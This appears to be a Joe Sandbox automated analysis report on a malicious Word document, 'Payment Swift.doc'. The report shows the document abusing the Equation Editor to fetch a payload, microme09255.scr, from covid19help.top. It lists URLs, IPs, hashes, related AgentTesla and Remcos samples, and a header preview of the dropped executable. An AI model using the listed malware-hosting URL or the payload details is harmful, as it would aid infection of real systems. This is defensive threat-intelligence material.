http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authentication	microme09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.dr	false		high
https://covid19help.top/t	EQNEDT32.EXE, 00000002.00000003.346877641.000000000061B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://api.ipify.org	microme09255.scr, 00000005.00000002.348615893.000000000339A000.00000004.00000800.00020000.00000000.sdmp, microme09255.scr, 00000006.00000002.883885788.00000000022C1000.00000004.00000800.00020000.00000000.sdmp, microme09255.scr, 00000006.00000002.883629068.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/streetaddress	microme09255.scr.2.dr	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/homephone	microme09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.dr	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dateofbirthyhttp://schemas.xmlsoap.org/ws/2005	microme09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.dr	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysidrhttp://schemas.xmlsoap.org/ws/2005	microme09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.dr	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/webpage	microme09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.dr	false		high
http://docs.oasis-open.org/ws-sx/ws-secureconversation/200512/dk/p_sha1	EQNEDT32.EXE, 00000002.00000003.346863072.000000000426C000.00000004.00000020.00020000.00000000.sdmp, microme09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.dr	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/right/identity	microme09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.dr	false		high
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd	microme09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.dr	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/privatepersonalidentifier	microme09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.dr	false		high
http://ocsp.entrust.net0D	EQNEDT32.EXE, 00000002.00000002.348086913.000000000066A000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.346867219.0000000000663000.00000004.00000020.00020000.00000000.sdmp, microme09255.scr, 00000006.00000002.884220115.00000000059F0000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/anonymous	microme09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.dr	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	microme09255.scr, 00000006.00000002.883885788.00000000022C1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://covid19help.top/microm.scrkkC:	EQNEDT32.EXE, 00000002.00000002.347780884.00000000005FE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddressthttp://schemas.xmlsoap.org/ws/200	microme09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.dr	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty	microme09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.dr	false		high
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#STR-Transform0Tran	microme09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.dr	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier	microme09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.dr	false		high
https://account.dyn.com/	microme09255.scr, 00000005.00000002.348615893.000000000339A000.00000004.00000800.00020000.00000000.sdmp, microme09255.scr, 00000006.00000002.883629068.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		high
http://crl.entrust.net/server1.crl0	EQNEDT32.EXE, 00000002.00000002.348086913.000000000066A000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.346867219.0000000000663000.00000004.00000020.00020000.00000000.sdmp, microme09255.scr, 00000006.00000002.884220115.00000000059F0000.00000004.00000020.00020000.00000000.sdmp	false		high
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#STR-Transform	microme09255.scr.2.dr	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysidshttp://schemas.xmlsoap.org/ws/2005	microme09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.dr	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/x500distinguishedname	microme09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.dr	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/postalcode	microme09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.dr	false		high
https://covid19help.top/microm.scrj	EQNEDT32.EXE, 00000002.00000002.347780884.00000000005FE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/postalcodezhttp://schemas.xmlsoap.org/ws/2005/	microme09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.dr	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/otherphone	microme09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.dr	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/mobilephone	microme09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.dr	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/locality	microme09255.scr.2.dr	false		high
https://api.ipify.org/t	microme09255.scr, 00000006.00000002.883885788.00000000022C1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/givenname	microme09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.dr	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/country	microme09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.dr	false		high
http://api.ipify.org	microme09255.scr, 00000006.00000002.883885788.000000000237E000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	EQNEDT32.EXE, 00000002.00000002.348086913.000000000066A000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.346867219.0000000000663000.00000004.00000020.00020000.00000000.sdmp, microme09255.scr, 00000006.00000002.884220115.00000000059F0000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/rightzhttp://schemas.xmlsoap.org/ws/2005/05/identity/	microme09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.dr	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims~http://schemas.xmlsoap.org/ws/2005/05/identity	microme09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.dr	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/thumbprintrhttp://schemas.xmlsoap.org/ws/2005/	microme09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.dr	false		high
https://secure.comodo.com/CPS0	EQNEDT32.EXE, 00000002.00000003.346877641.0000000000632000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.347780884.0000000000632000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.348086913.000000000066A000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.346867219.0000000000663000.00000004.00000020.00020000.00000000.sdmp, microme09255.scr, 00000006.00000002.884220115.00000000059F0000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddressuhttp://schemas.xmlsoap.org/ws/200	microme09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.dr	false		high
http://crl.entrust.net/2048ca.crl0	EQNEDT32.EXE, 00000002.00000002.348086913.000000000066A000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.346867219.0000000000663000.00000004.00000020.00020000.00000000.sdmp, microme09255.scr, 00000006.00000002.884220115.00000000059F0000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/x500distinguishedname~http://schemas.xmlsoap.o	microme09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.dr	false		high
https://covid19help.top/microm.scrY	EQNEDT32.EXE, 00000002.00000002.347780884.00000000005FE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authorizationdecision	microme09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.dr	false		high
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd	microme09255.scr.2.dr	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/privatepersonalidentifierzhttp://schemas.xmlso	microme09255.scr, 00000005.00000000.346915101.0000000000DE2000.00000020.00000001.01000000.00000004.sdmp, microm[1].scr.2.dr, microme09255.scr.2.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.83.128	covid19help.top	United States		13335	CLOUDFLARENETUS	true
172.67.74.152	api.ipify.org	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1431944
Start date and time:	2024-04-26 03:05:00 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 4s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	11
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Payment Swift.doc
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winDOC@7/9@2/2
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Successful, ratio: 97% Number of executed functions: 52 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .doc Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Active ActiveX Object Scroll down Close Viewer Override analysis time to 78551.5447925215 for current running targets taking high CPU consumption Override analysis time to 157103.089585043 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, svchost.exe
Execution Graph export aborted for target EQNEDT32.EXE, PID 2452 because there are no executed function
HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
03:05:46	API Interceptor	303x Sleep call for process: EQNEDT32.EXE modified
03:05:50	API Interceptor	9292484x Sleep call for process: microme09255.scr modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.83.128	rks18.doc	Get hash	malicious	AgentTesla	Browse
	msXkgFIUyS.rtf	Get hash	malicious	AgentTesla	Browse
	BANK LETTER.doc	Get hash	malicious	AgentTesla	Browse
	You2bjAMeg.doc	Get hash	malicious	HTMLPhisher	Browse
	PO.doc	Get hash	malicious	Remcos	Browse
	r29EHJocKX.rtf	Get hash	malicious	Unknown	Browse
	aaaaaa.docx.doc	Get hash	malicious	Unknown	Browse
	APMR1GTlQS.rtf	Get hash	malicious	Unknown	Browse
	JBWI8Xqw4E.exe	Get hash	malicious	Unknown	Browse
	putin1337-202384344125.exe	Get hash	malicious	Unknown	Browse
172.67.74.152	Sonic-Glyder.exe	Get hash	malicious	Stealit	Browse	api.ipify.org/?format=json
	Sky-Beta.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/?format=json
	Sky-Beta.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/?format=json
	Sky-Beta-Setup.exe	Get hash	malicious	Stealit	Browse	api.ipify.org/?format=json
	Sky-Beta.exe	Get hash	malicious	Stealit	Browse	api.ipify.org/?format=json
	SongOfVikings.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/?format=json
	SongOfVikings.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/?format=json
	Sky-Beta Setup 1.0.0.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/?format=json

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
covid19help.top	Remittance-Advice.doc	Get hash	malicious	Unknown	Browse	172.67.175.222
	Invoice.doc	Get hash	malicious	Unknown	Browse	172.67.175.222
	New Quotation.doc	Get hash	malicious	AgentTesla	Browse	172.67.175.222
	CTM REQUEST BIRTHSHIP.doc	Get hash	malicious	AgentTesla	Browse	172.67.175.222
	rks18.doc	Get hash	malicious	AgentTesla	Browse	104.21.83.128
	msXkgFIUyS.rtf	Get hash	malicious	AgentTesla	Browse	104.21.83.128
	BANK LETTER.doc	Get hash	malicious	AgentTesla	Browse	104.21.83.128
	You2bjAMeg.doc	Get hash	malicious	HTMLPhisher	Browse	104.21.83.128
	Arrival Notice.doc	Get hash	malicious	Unknown	Browse	172.67.175.222
	PO.doc	Get hash	malicious	Remcos	Browse	104.21.83.128
api.ipify.org	https://lide.alosalca.fun/highbox#joeblow@xyz.com	Get hash	malicious	HTMLPhisher	Browse	104.26.13.205
	http://asana.wf	Get hash	malicious	Unknown	Browse	172.67.74.152
	o3KyzpE7F4.ps1	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	172.67.74.152
	http://wsj.pm	Get hash	malicious	NetSupport RAT	Browse	104.26.12.205
	16770075581.zip	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.26.12.205
	SecuriteInfo.com.Win32.PWSX-gen.18376.4403.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.26.12.205
	SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.26.12.205
	Proforma Request.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	Spare part list.pdf.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.26.12.205
	DHL EXPRESS.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	https://marinatitle.com	Get hash	malicious	Unknown	Browse	104.17.24.14
	ad.msi	Get hash	malicious	Latrodectus	Browse	172.67.219.28
	https://ndw5xvotehflt.pages.dev/smart89/	Get hash	malicious	Unknown	Browse	104.21.53.38
	https://cnmxukx5efilc7lvlel.pages.dev/smart89/	Get hash	malicious	Unknown	Browse	172.66.44.161
	https://m7qfa5ng4lp7.blob.core.windows.net/m7qfa5ng4lp7/1.html?4rKpnF7821CfLO43wsacrvmomp962ETPJQJTKIDNZNNV65316UFUY14332V14#14/43-7821/962-65316-14332	Get hash	malicious	Phisher	Browse	104.18.26.50
	https://bocmyw606y.pages.dev/smart89/	Get hash	malicious	Unknown	Browse	172.66.44.172
	https://uporniacomnuvidx.z13.web.core.windows.net/index.html	Get hash	malicious	TechSupportScam	Browse	104.17.25.14
	https://markssmith.icu/23d80j2d/qwd13d8jqd/index.html?13813e8=0101%2048076%2044139&13813e8=https://playgames5.net	Get hash	malicious	TechSupportScam	Browse	104.21.12.42
	https://tron2qk6vdl.z13.web.core.windows.net/Wind0s01Ersys44/index.html	Get hash	malicious	TechSupportScam	Browse	104.21.53.38
	https://aulixalrrydrea.pages.dev/	Get hash	malicious	HTMLPhisher	Browse	172.66.47.90
CLOUDFLARENETUS	https://marinatitle.com	Get hash	malicious	Unknown	Browse	104.17.24.14
	ad.msi	Get hash	malicious	Latrodectus	Browse	172.67.219.28
	https://ndw5xvotehflt.pages.dev/smart89/	Get hash	malicious	Unknown	Browse	104.21.53.38
	https://cnmxukx5efilc7lvlel.pages.dev/smart89/	Get hash	malicious	Unknown	Browse	172.66.44.161
	https://m7qfa5ng4lp7.blob.core.windows.net/m7qfa5ng4lp7/1.html?4rKpnF7821CfLO43wsacrvmomp962ETPJQJTKIDNZNNV65316UFUY14332V14#14/43-7821/962-65316-14332	Get hash	malicious	Phisher	Browse	104.18.26.50
	https://bocmyw606y.pages.dev/smart89/	Get hash	malicious	Unknown	Browse	172.66.44.172
	https://uporniacomnuvidx.z13.web.core.windows.net/index.html	Get hash	malicious	TechSupportScam	Browse	104.17.25.14
	https://markssmith.icu/23d80j2d/qwd13d8jqd/index.html?13813e8=0101%2048076%2044139&13813e8=https://playgames5.net	Get hash	malicious	TechSupportScam	Browse	104.21.12.42
	https://tron2qk6vdl.z13.web.core.windows.net/Wind0s01Ersys44/index.html	Get hash	malicious	TechSupportScam	Browse	104.21.53.38
	https://aulixalrrydrea.pages.dev/	Get hash	malicious	HTMLPhisher	Browse	172.66.47.90

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
7dcce5b76c8b17472d024758970a406b	Normal.dotm.doc	Get hash	malicious	Unknown	Browse	104.21.83.128
	Database4.exe	Get hash	malicious	Unknown	Browse	104.21.83.128
	Database4.exe	Get hash	malicious	Unknown	Browse	104.21.83.128
	SecuriteInfo.com.Exploit.ShellCode.69.19968.913.rtf	Get hash	malicious	Remcos	Browse	104.21.83.128
	iwjvkEAIQa.rtf	Get hash	malicious	Unknown	Browse	104.21.83.128
	xF3wienia PO2102559-1.xlsx	Get hash	malicious	Unknown	Browse	104.21.83.128
	New Order - DUBAI BURJ KHALIFA LLC - PRICE ENQUIRY - RFQ 60000764690.xla.xlsx	Get hash	malicious	Unknown	Browse	104.21.83.128
	Payment MT103.xls	Get hash	malicious	Unknown	Browse	104.21.83.128
	New Order .doc	Get hash	malicious	Unknown	Browse	104.21.83.128
	Remittance-Advice.doc	Get hash	malicious	Unknown	Browse	104.21.83.128
36f7277af969a6947a61ae0b815907a1	gmb.xls	Get hash	malicious	Unknown	Browse	172.67.74.152
	scripttodo.ps1	Get hash	malicious	Unknown	Browse	172.67.74.152
	New Quotation.doc	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Get hash	malicious	PureLog Stealer, zgRAT	Browse	172.67.74.152
	TransactionSummary_910020049836765_110424045239.xlsx	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	msXkgFIUyS.rtf	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	BANK LETTER.doc	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	NEW GRACE- RFQ .doc	Get hash	malicious	AgentTesla, GuLoader	Browse	172.67.74.152
	78YW3Fcvv0.rtf	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	Booking copy.xls	Get hash	malicious	AgentTesla	Browse	172.67.74.152

Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	857600
Entropy (8bit):	7.172009190400047
Encrypted:	false
SSDEEP:	12288:yZ9pzkL1KcPt7sOcflZDLpp8jlMVGdAbNASR8OA10aIkiU:yZ9pzUH7ZEdv8JMVGdGAS210aIki
MD5:	75DC78C375DFEE9C0B96FA476BCD5D1C
SHA1:	2F61518B7B14B35B9E4FC53C99455C9D2293F139
SHA-256:	5EA4437DF5DCC07B35C3959A6FC54D07415D77A659F277FD73F34CCCFBBFE1AD
SHA-512:	81673AB01120F7D15675852B4CF3ED020BE1D1BC8494D9DAC213D33324CD22CFE22652FCD85DA06E438C8494FCD19B1E638805651B5412A83AB9912D48015EDB
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....2................0..............(... ...@....@.. ....................................@.................................X(..S....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................(......H...........@ ..............p?..........................................0.1.2.3.4.5.6.7.8.9.....WCF.....Kerberos.H.........&.(1.....".......J.~....t....(6...&..{...."..}......{...."..}......{...."..}......{...."..}......{...."..}......{...."..}......{...."..}....".(1.....(.........(7...~....(....o8...o9....#........{...."..}......{...."..}......{...."..}......{...."..}......{...."..}......{...."..}......{...."..}...."..(=...*..{W...-...}W....

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{1654943A-8722-402F-85B2-DE354B391398}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	CE338FE6899778AACFC28414F2D9498B
SHA1:	897256B6709E1A4DA9DABA92B6BDE39CCFCCD8C1
SHA-256:	4FE7B59AF6DE3B665B67788CC2F99892AB827EFAE3A467342B3BB4E3BC8E5BFE
SHA-512:	6EB7F16CF7AFCABE9BDEA88BDAB0469A7937EB715ADA9DFD8F428D9D38D86133945F5F2F2688DDD96062223A39B5D47F07AFC3C48D9DB1D5EE3F41C8D274DCCF
Malicious:	false
Reputation:	high, very likely benign file
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{E7CB4438-AB7B-43D3-857E-02E3B20A8674}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	60416
Entropy (8bit):	3.606068886856527
Encrypted:	false
SSDEEP:	768:igI2Q5Q6IQXwvW5Kq2g05gI2Q5Q6IQXwvW5Kq2g05gI2Q5Q6IQXwvW5Kq2g0bfxV:BSyemuSyemuSyemv7rlx
MD5:	5CFCC448FC348897F50C4BE101B8DD3F
SHA1:	15F0F4307A5F40EB626C1C4AA0A4D007D614FBF3
SHA-256:	DCD064EE0E77319C05CEFFAC8A26671154BDF7FB84EAFE7263B8FB32019BCA0D
SHA-512:	AB167AE1B8A76A1263C512C6AC20CD5BD63240A511829A3C7A21330FD7A306E531BF938BBA1CDDEC92C0F23EFE540E900418CB9A12ACC48EDEFF25B75A6F0F83
Malicious:	false
Reputation:	low
Preview:	0.8.2.7.3.9.7.8.p.l.e.a.s.e. .c.l.i.c.k. .E.n.a.b.l.e. .e.d.i.t.i.n.g. .f.r.o.m. .t.h.e. .y.e.l.l.o.w. .b.a.r. .a.b.o.v.e...T.h.e. .i.n.d.e.p.e.n.d.e.n.t. .a.u.d.i.t.o.r.s.. .o.p.i.n.i.o.n. .s.a.y.s. .t.h.e. .f.i.n.a.n.c.i.a.l. .s.t.a.t.e.m.e.n.t.s. .a.r.e. .f.a.i.r.l.y. .s.t.a.t.e.d. .i.n. .a.c.c.o.r.d.a.n.c.e. .w.i.t.h. .t.h.e. .b.a.s.i.s. .o.f. .a.c.c.o.u.n.t.i.n.g. .u.s.e.d. .b.y. .y.o.u.r. .o.r.g.a.n.i.z.a.t.i.o.n... .S.o. .w.h.y. .a.r.e. .t.h.e. .a.u.d.i.t.o.r.s. .g.i.v.i.n.g. .y.o.u. .t.h.a.t. .o.t.h.e.r. .l.e.t.t.e.r. .I.n. .a.n. .a.u.d.i.t. .o.f. .f.i.n.a.n.c.i.a.l. .s.t.a.t.e.m.e.n.t.s.,. .p.r.o.f.e.s.s.i.o.n.a.l. .s.t.a.n.d.a.r.d.s. .r.e.q.u.i.r.e. .t.h.a.t. .a.u.d.i.t.o.r.s. .o.b.t.a.i.n. .a.n. .u.n.d.e.r.s.t.a.n.d.i.n.g. .o.f. .i.n.t.e.r.n.a.l. .c.o.n.t.r.o.l.s. .t.o. .t.h.e. .e.x.t.e.n.t. .n.e.c.e.s.s.a.r.y. .t.o. .p.l.a.n. .t.h.e. .a.u.d.i.t... .A.u.d.i.t.o.r.s. .u.s.e. .t.h.i.s. .u.n.d.e.r.s.t.a.n.d.i.n.g. .o.f. .i.n.t.e.r.n.a.l. .c.o.n.t.r.o.l.s. .t.o. .a.s.s.e.s.s. .

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{F049A0BE-DDAA-4F28-9F33-B6FAFB134366}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1024
Entropy (8bit):	0.05390218305374581
Encrypted:	false
SSDEEP:	3:ol3lYdn:4Wn
MD5:	5D4D94EE7E06BBB0AF9584119797B23A
SHA1:	DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:	95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:	false
Reputation:	high, very likely benign file
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Payment Swift.LNK

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:04 2023, mtime=Fri Aug 11 15:42:04 2023, atime=Fri Apr 26 00:05:44 2024, length=139992, window=hide
Category:	dropped
Size (bytes):	1029
Entropy (8bit):	4.583397172116236
Encrypted:	false
SSDEEP:	12:81Ofh3gXg/XAlCPCHaXaTBbTB/Dr8xX+WR3OdcD4icvbGGec4yDtZ3YilMMEpxRL:8AH/XTKT9TxO/3CcXeDe2Dv3qKk7N
MD5:	274A778D3EC295F948D2E767D0C1EDC9
SHA1:	18A8D36D9D25D86ED80373D972A125DF86E3F89C
SHA-256:	C6BA8CFE0F5071CBC7788A1F7E720D8B34F0349A24E9F33B34473EA411E89BF9
SHA-512:	4BDB099BF8422AFE4264016982D3918884135955B2C41043CC8CE6739309205F3A7A81B7D38274661677D879BAE7488F3F100E1B5F594F343E592BF37F280ACA
Malicious:	false
Reputation:	low
